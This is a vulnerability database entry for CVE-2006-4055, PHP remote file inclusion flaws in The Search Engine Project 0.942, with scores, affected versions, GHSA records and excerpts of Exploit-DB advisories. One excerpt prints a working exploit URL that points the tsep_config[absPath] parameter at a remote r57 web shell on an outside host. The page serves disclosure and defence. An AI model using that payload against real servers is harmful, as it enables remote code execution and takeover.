CVE-2006-4055
published 2006-08-10CVE-2006-4055: Multiple PHP remote file inclusion vulnerabilities in Olaf Noehring The Search Engine Project (TSEP) 0.942 and earlier allow remote attackers to execute…
PriorityP340high7.5CVSS 2.0
AVNACLAuNCPIPAP
EXPLOIT
EPSS
3.83%
88.8th percentile
Multiple PHP remote file inclusion vulnerabilities in Olaf Noehring The Search Engine Project (TSEP) 0.942 and earlier allow remote attackers to execute arbitrary PHP code via a URL in the tsep_config[absPath] parameter to (1) include/colorswitch.php, (2) contentimages.class.php, (3) ipfunctions.php, (4) configfunctions.php, (5) printpagedetails.php, or (6) log.class.php. NOTE: the copyright.php vector is already covered by CVE-2006-3993.
Affected
2 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| olaf_noehring | the_search_engine_project | <= 0.942 | — |
| tsep | tsep | <= 0.942 | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-9xc9-cc34-mr9j: PHP remote file inclusion vulnerability in Olaf Noehring The Search Engine Project (TSEP) 0
ghsa_unreviewed·2022-05-01·CVSS 7.5
CVE-2006-4085 [HIGH] GHSA-9xc9-cc34-mr9j: PHP remote file inclusion vulnerability in Olaf Noehring The Search Engine Project (TSEP) 0
PHP remote file inclusion vulnerability in Olaf Noehring The Search Engine Project (TSEP) 0.942 and earlier allows remote attackers to execute arbitrary PHP code via a URL in the tsep_config[absPath] parameter to pagenavigation.php, a different vector than CVE-2006-4055. NOTE: the provenance of this information is unknown; the details are obtained from third party information.
GHSA
GHSA-4gw2-cpvx-xqjf: Multiple PHP remote file inclusion vulnerabilities in Olaf Noehring The Search Engine Project (TSEP) 0
ghsa_unreviewed·2022-05-01·CVSS 5.1
CVE-2006-4055 [MEDIUM] GHSA-4gw2-cpvx-xqjf: Multiple PHP remote file inclusion vulnerabilities in Olaf Noehring The Search Engine Project (TSEP) 0
Multiple PHP remote file inclusion vulnerabilities in Olaf Noehring The Search Engine Project (TSEP) 0.942 and earlier allow remote attackers to execute arbitrary PHP code via a URL in the tsep_config[absPath] parameter to (1) include/colorswitch.php, (2) contentimages.class.php, (3) ipfunctions.php, (4) configfunctions.php, (5) printpagedetails.php, or (6) log.class.php. NOTE: the copyright.php vector is already covered by CVE-2006-3993.
No detection rules found.
Exploit-DB
TSEP 0.942 - 'colorswitch.php' Remote File Inclusion
exploitdb·2006-08-02
CVE-2006-4055 TSEP 0.942 - 'colorswitch.php' Remote File Inclusion
TSEP 0.942 - 'colorswitch.php' Remote File Inclusion
---
Script: TSEP
Comments: "register_globals" must be enabled duh.
document.this != http://www.milw0rm.com/exploits/2098
Vulnerable Files/Code:
./tsep.0942/include/colorswitch.php?tsep_config[absPath]=http://rst.void.ru/download/r57shell.txt?
./tsep.0942/include/printpagedetails.php => require_once(
$tsep_config["absPath"]."/include/convert_htmlent.php" );
./tsep.0942/include/ipfunctions.php => require_once(
$tsep_config["absPath"]."/include/IPv6.php" );
./tsep.0942/include/contentimages.class.php => require_once(
$tsep_config["absPath"]."/include/contentimages.class.php" );
./tsep.0942/include/configfunctions.php => require_once(
$tsep_config["absPath"]."/include/mmexfunctions.php" );
./tsep.0942/include/log.class.php => require_once
Exploit-DB
TSEP 0.942 - 'copyright.php' Remote File Inclusion
exploitdb·2006-08-01
CVE-2006-4085 TSEP 0.942 - 'copyright.php' Remote File Inclusion
TSEP 0.942 - 'copyright.php' Remote File Inclusion
---
+--------------------------------------------------------------------
+
+ TSEP 0.9.4.2
+
+--------------------------------------------------------------------
+
+ Affected Software .: TSEP 0.9.4.2
+ Venedor ...........: http://www.tsep.info/
+ Class .............: Remote File Inclusion
+ Risk ..............: high (Remote File Execution)
+ Found by ..........: Philipp Niedziela
+ Original advisory .: http://www.bb-pcsecurity.de/
+ Contact ...........: webmaster[at]bb-pcsecurity[.]de
+
+--------------------------------------------------------------------
+
+ Code /include/copyright.php:
+
+ .....
+
+ .....
+
+--------------------------------------------------------------------
+
+ $tsep_config["absPath"] is not properly sanitized befor
No writeups or analysis indexed.
http://secunia.com/advisories/21291http://securityreason.com/securityalert/1354http://sourceforge.net/forum/forum.php?forum_id=597790http://sourceforge.net/forum/forum.php?thread_id=1546639&forum_id=369628http://www.securityfocus.com/archive/1/442098/100/0/threadedhttp://www.securityfocus.com/bid/19326https://exchange.xforce.ibmcloud.com/vulnerabilities/28107https://www.exploit-db.com/exploits/2116http://secunia.com/advisories/21291http://securityreason.com/securityalert/1354http://sourceforge.net/forum/forum.php?forum_id=597790http://sourceforge.net/forum/forum.php?thread_id=1546639&forum_id=369628http://www.securityfocus.com/archive/1/442098/100/0/threadedhttp://www.securityfocus.com/bid/19326https://exchange.xforce.ibmcloud.com/vulnerabilities/28107https://www.exploit-db.com/exploits/2116
2006-08-10
Published